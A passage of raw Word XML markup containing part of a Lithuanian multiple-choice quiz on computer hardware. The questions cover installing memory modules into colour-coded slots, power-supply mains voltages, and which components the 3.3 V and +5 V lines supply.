          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> spalv</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, kiti du</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kit</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>montuo</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">kite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>dvi plokštel</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>s. Kas nutiks</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jeigu </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>montuosim</w:t>
      </w:r>
      <w:r w:rsidR="00B118D7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> plokšteles</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>į skirtingų spalvų lizdus?</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk67721219"/>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="3A79F0BB" w14:textId="4D0AF2B2"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ompiuterio </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>darbui</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>tai neturės</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> įtakos</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315123E" w14:textId="09FB8FE2"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>o operatyvioji atmintis bus neatpažinta, todėl jis paprasčiausiai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>neveiks;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69CC56" w14:textId="54486385"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">peratyvioji atmintis veiks tik </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>per vieną</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kanal</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDA9DF4" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D0C3CE" w14:textId="2772018B" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>10. K</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>uri iš išvardintų įtampų tinka maitinimo blokui? Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF47108" w14:textId="5809BF84" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) 2</w:t>
      </w:r>
      <w:r w:rsidR="25967E43" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>0 V</w:t>
      </w:r>
      <w:r w:rsidR="51CC294C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="51CC294C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lietuvoje</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1066A" w14:textId="5F65D539" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) 110 V – JAV</w:t>
      </w:r>
      <w:r w:rsidR="557559B5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir kitur</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>, 2</w:t>
      </w:r>
      <w:r w:rsidR="5ECF645C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00EE1A3A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="7622E71C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="7622E71C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lietuvoje</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367FE76D" w14:textId="71EE0B6B"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>atikrinti nebūtina</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>paliekam</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> standartinį </w:t>
      </w:r>
      <w:r w:rsidR="00D474A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">gamyklinį </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>nustatymą</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BB354" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4881D7A4" w14:textId="0AD7AD2C" w:rsidR="00DF24A2" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>11. K</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>uriems</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterio komponentams</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> maitinimą </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>teikia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3,3 V linija?</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F42004" w14:textId="29BA8728"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rocesoriui ir vaizdo plokštei</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D1F6F" w14:textId="6BF509C8"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>agrindinės plokštės komponentams</w:t>
      </w:r>
      <w:r w:rsidR="00DF24A2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632BA0F7" w14:textId="39221B05"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>iskiniams kaupikliams</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200100F" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A3EA59" w14:textId="21637CBF" w:rsidR="006747E4" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>12. K</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>uriems</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterio komponentams maitinimą</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiekia</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> +5 V linija</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CCF4E9" w14:textId="50A2F0ED" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) USB įrenginiams ir PCI plokštėms</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC85B5" w14:textId="65FCBF27"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b) </w:t>
      </w:r>
